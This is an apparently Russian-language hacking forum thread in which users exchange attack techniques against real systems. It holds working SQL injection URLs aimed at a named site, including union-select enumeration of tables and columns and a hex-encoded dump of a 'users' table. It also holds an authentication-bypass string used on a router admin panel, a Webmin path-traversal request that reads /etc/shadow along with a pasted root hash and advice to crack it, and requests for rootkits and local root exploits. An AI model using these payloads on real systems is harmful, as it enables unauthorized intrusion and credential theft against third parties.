LokbatanLi Прочитай то что тебе люди рекомендуют, если бы перевел захексенное в текст в последнем моем запросе для тебя, то о чудо там бы и ссыль на как ракрутить скулю была и еще многие ответы на твои вопросы, а если тебе не подобрать число столбцов в скуле то или ищи в другом месте скулю с выводом , или крути cкулю как слепую (блайнд) http://www.xxx.com/news.php?iid=1+AND+SUBSTRING((version())=x где х меняешь в соответствие с запросом... или http://www.xxx.com/news.php?iid=1+AND+ASCII(SUBSTRING((version() ),1,1))>char твоего запроса www.translit.ru обеспечит нормальное отношение к тебе и позволит сформулировать вопрос на который можно будет ответить ...
vot naprimer http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/* zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
LokbatanLi Меня поражает ваше упорство задавать такие дурацкие вопросы...вы вообще читаете что вам люди отвечают и рекомендуют? если вы не считаете нужным следовать советам участникам форума, то зачем же тогда спрашивать?или вам всю статью про скули и раскрутку их суда переписать? Вы случаем не ошиблись? видимо из вас не то что хакера..ламера нормального не получится... З.Ы. Прошу модеров не считать мои высказывания за флуд !
Не совсем тебя понял, но попытаюсь предположить: Выводимые поля: 4,5. Вместо любого из них поставляем version(). Запрос принимает вид: Code: http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/* Если версия 5, значит нам доступна information_schema, tables и columns соответственно. Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда: Code: http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/* Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано. Далее - хотим узнать имя колонки. Делаем запрос: Code: http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns/* Нужную перебираем тем же способом, что и имена таблиц. Я тебя правильно понял, или всё ещё нет?
offf blin zdes est nomerki 4,5 a esli bi ix ne bival 4to zdelali?? kak mojem uznat v kakom nomere sidyat columns name
LokbatanLi ну ты ёпрст задолбал уже..нет вывода ..значит крути как слепую...я тебе же написал выше... З.Ы. В таджикистоне тоже каникулы?
Вот рабочий пример для твоей ссылки: Code: http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,group_concat(0x20,column_name),6,7+from+information_schema.columns+where+table_name=0x7573657273/* Вывод колонок из таблицы "users' (0x7573657273 - имя таблицы в hex).
Подскажите,запускаю локал рут сплойт на шеле пишет No job control on this shell Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =) В чём трабла? P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему? P.S.S. Уффф,порутал. =) Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)
кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ? (FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit) написано запускать так: usage: ./x <allproc>\n что за параметр allproc?
В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку PHP: http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd показывает это (урывок): root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin И такую: PHP: http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow Показывает такое (урывок): root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99999:7::: bin:*:14346:0:99999:7::: daemon:*:14346:0:99999:7::: adm:*:14346:0:99999:7::: lp:*:14346:0:99999:7::: sync:*:14346:0:99999:7::: shutdown:*:14346:0:99999:7::: halt:*:14346:0:99999:7::: mail:*:14346:0:99999:7::: news:*:14346:0:99999:7::: uucp:*:14346:0:99999:7::: Можно логин-пароль найти в этих данных?
-> Интересный, кстати говоря, случай. Чтобы расшифровать пароля рута используй JohnTheRipper -- Баг оказался древним http://www.fduran.com/blog/webmin-vulnerability-exposing-your-password-or-any-file/
JohnTheRipper для *nix. Для винды тоже есть, только как им пользоваться ... просцу. Подскажите, что это за хеш? Какой алг его расшифровки. И где логин? ( Если туплю, сорри. Я не хакер, я просто бесплатного интернета хочу. Потому прошу помощи) Нашел руководство по JohnTheRipper. Теперь проблема в другом. JTR нужно кормить файлом с содержимым root:6xp8Tw7//32x2:0:0:root:/:/bin/bash А у меня содержимое в shadow root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99999:7::: А в passwd: root:x:0:0:root:/root:/bin/bash Западло. Что делать?
Всем спасибо. Может кому пригодится: получил root скриптом PHP: <?php phpinfo() ?> Админ продолжает сосать)))
Хеш: FreeBSD MD5 Логин: Root На счёт алгоритма в google поищи. ------------ Просто скопируй root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7::: в файл shadow и переберай джоником ./john shadow
Подскажите пожалуста, возможно ли проснифать трафик хоста например 192.168.2.1 c машины с адресом 192.168.1.1 разделлённые маршрутизатороми, если хост 192.168.1.1 физически соединён только с маршрутизатором, и в ARP таблици только адрес этого маррутизатора?